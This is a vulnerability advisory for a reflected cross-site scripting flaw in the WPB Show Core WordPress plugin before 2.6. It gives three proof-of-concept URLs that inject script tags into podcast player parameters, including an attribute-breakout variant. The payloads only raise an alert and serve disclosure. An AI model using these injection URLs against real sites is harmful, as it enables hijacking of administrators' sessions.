wpexploit | Author: Aly Khaled Aly Abd Al-aal | WPEX-ID: 56D4FC48-D0DC-4AC6-93CD-F64D4C3C5C07
History: Mar 18, 2024 - 12:00 a.m.

WPB Show Core < 2.6 - Reflected XSS

Tags: vulnerability, wpb show core, reflected xss, malicious script injection, podcastname, podcastslug, title, podcastimage, podcastimg_url, audioplayeroption

AI Score: 6 Medium (confidence: High)
EPSS: 0.0004 Low (percentile: 9.0%)

Description: The plugin does not sanitise and escape some request parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting vulnerability which could be used against high-privilege users such as an admin. The proofs of concept below request the module script modules/jplayer_new/jplayer_twitter_ver_1.php directly by path and show the injected payload coming back in the podcastName, podcastSlug, title and fileList[0][title] parameters; the page's tags additionally name podcastimage, podcastimg_url and audioplayeroption. As with any reflected XSS, the victim must be made to open the crafted link (for example while logged in as an administrator) for the script to run in their session.

PoC 1 (podcastName; the payload is a bare script tag, which suggests the value is reflected in HTML text context):

https://example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?podcastName=%3Cscript%3Ealert(1337)%3C/script%3E

PoC 2 (podcastSlug; the payload opens with %22%3E, i.e. "> to close an attribute value and its tag first, which suggests this value is reflected inside an HTML attribute):

https://example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?podcastSlug=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E//

PoC 3 (title and fileList[0][title], carried inside an otherwise complete player request; the remaining parameters are the ones the embed normally sends and are left benign):

https://www.example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?title=1-18-24%3Cscript%3Ealert(1337)%3C/script%3E&podcastName=Lightning+Thursdays&podCastImage=https%3A%2F%2Fdehayf5mhw1h7.cloudfront.net%2Fwp-content%2Fuploads%2Fsites%2F874%2F2018%2F03%2F26232451%2Fhendersonville-lightning.png&podcastSlug=lightning-thursdays&siteurl=https%3A%2F%2Fwww.example.com&fileList%5B0%5D%5Bid%5D=49824&fileList%5B0%5D%5Bmp3%5D=https%3A%2F%2Fdehayf5mhw1h7.cloudfront.net%2Fwp-content%2Fuploads%2Fsites%2F874%2F2024%2F01%2F18105309%2FLightning-TODAY-1-18-24.mp3&fileList%5B0%5D%5Btitle%5D=1-18-241-2%3Cscript%3Ealert(1337)%3C/script%3E&fileList%5B0%5D%5Bactual_mp3%5D=&blogid=874&rss_feed_link=https%3A%2F%2Fwww.example.com%2Fpodcast%2Flightning-thursdays%2Ffeed%2F%3Fpost_type%3Depisode&podImg_URL=https%3A%2F%2Fdehayf5mhw1h7.cloudfront.net%2Fwp-content%2Fuploads%2Fsites%2F874%2F2018%2F03%2F26232451%2Fhendersonville-lightning.png&podCastId=78&episodeId=49824&audioPlayerOption=advance&gmf=-5&ckd=www.example.com&embedFlag=podcast

